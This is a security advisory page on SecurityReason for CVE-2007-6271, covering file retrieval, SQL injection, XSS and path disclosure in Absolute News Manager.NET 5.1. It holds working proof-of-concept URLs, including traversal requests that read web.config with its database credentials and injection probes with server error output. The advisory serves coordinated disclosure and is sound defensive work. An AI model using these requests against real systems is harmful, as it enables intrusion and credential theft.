|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 3421 CVE : CVE-2007-6271 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : Adrian Pastor, Jan Fry and Richard Brain Published : 07.12.2007
Advisory Text : PR07-39: Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection Vulnerabilities found: 16 November 2007 Vendor informed: 19 November 2007 Vulnerability fixed: 28 November 2007 Severity: High Description: Multiple vulnerabilities were found on Absolute News Manager.NET 5.1: - unauthenticated file retrieval (directory traversal) on '/pages/default.aspx' - unauthenticated SQL injection on 'xlaabsolutenm.aspx' and possibly '/pages/default.aspx' - XSS on 'xlaabsolutenm.aspx' and '/pages/default.aspx' - webroot disclosure on 'getpath.aspx' File retrieval PoC: The following URL shows the contents of .NET 'web.config' (contains DB credentials): http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=. ./web.config The following URL show contents of the vulnerable script: http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=d efault.aspx%00 Note: in order to obtain the content of '.aspx' files, a null byte '%00' must be added after the filename. Show content of other scripts: http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../anmviewer. ascx%00 http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../default.as px%00 http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../PPL1Histor yTicker.aspx%00 http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlagc.ascx %00 http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlaabsolut enm.aspx%00 http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../streamconf ig.aspx%00 http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem. aspx%00 http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../articlefil es/r.asp%00 http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem. aspx%00 SQL injection PoCs: Vulnerable script: /[CustomerDefinedDir]/xlaabsolutenm.aspx Vulnerable parameters: z, pz, ord, sort Requesting the following URL returns the version of Windows and SQL server: http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz =9&featured=n&ord=desc&sort=posted&rmore=-& System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int. Other URLs: http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&s ort=headline'INJECTED_PAYLOAD&rmore=-& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'I NJECTED_PAYLOAD&sort=headline&rmore=-& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_ PAYLOAD&ord=asc&sort=headline&rmore=-& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_ PAYLOAD&ss=y&size=1.1em&target=iframe& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord= asc&sort=headline'INJECTED_PAYLOAD& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord= asc'INJECTED_PAYLOAD&sort=headline& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21'INJE CTED_PAYLOAD&ord=asc&sort=headline& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_P AYLOAD&pz=21&ord=asc&sort=headline& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&s ort=posted'INJECTED_PAYLOAD&featured=n& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc'I NJECTED_PAYLOAD&sort=posted&featured=n& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8'INJEC TED_PAYLOAD&featured=only& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featu red=n&ord=desc&sort=posted'INJECTED_PAYLOAD&rmore=-& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featu red=n&ord=desc'INJECTED_PAYLOAD&sort=posted&rmore=-& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9'INJEC TED_PAYLOAD&featured=n&ord=desc&sort=posted&rmore=-& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_P AYLOAD&ord=desc&sort=posted&featured=n& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_P AYLOAD&pz=8&featured=only& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_P AYLOAD&pz=9&featured=n&ord=desc&sort=posted&rmore=-& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&s ort=posted'INJECTED_PAYLOAD& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc'I NJECTED_PAYLOAD&sort=posted& http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_P AYLOAD&ord=desc&sort=posted& The script '/pages/default.aspx' might also be vulnerable to SQL injection but it has not been confirmed. Requesting the following URLs: http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=40&z=9999999 999999 http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=999999999999 9&z=1 return the following error: System.Data.SqlClient.SqlException: Error converting data type nvarchar to int. XSS PoCs: Vulnerable script: '/xlaabsolutenm.aspx' Unsanitized parameter: 'rmore' http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=1,7&sort=art icleID&ord=desc&rmore=%3Cscript%3Ealert(1)%3C/script%3E&size=2&h=abc&isf rame=y Vulnerable script: '/pages/default.aspx' Unsanitized parameter: 'template' http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=%3Cscript%3Ea lert(2)%3C/script%3E Webroot PoC: Requesting the 'getpath.aspx' demo script discloses the physical path of the webroot - ie: http://target.tld/[CustomerDefinedDir]/getpath.aspx " Absolute News Manager Physical Path : D:inetpubtarget.tld[CustomerDefinedDir] Please delete this file from your installation. " Consequences: Contents of any files on the web server can be obtained. Unauthorized SQL queries can be injected. Scripting code can be run within the security context of the target domain. Information about the target environment can be extracted. Fix: http://www.xigla.com/security/ http://www.xigla.com/security/ANMNET51-SecurityUpdate20071128.zip Note: ProCheckUp has NOT tested the patch provided by Xigla Software. References: http://www.procheckup.com/Vulnerability_2007.php http://www.xigla.com/absolutenmnet/ Credits: Adrian Pastor, Jan Fry and Richard Brain of ProCheckUp Ltd (www.procheckup.com) ProCheckUp thanks Xigla Software for working with us.  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |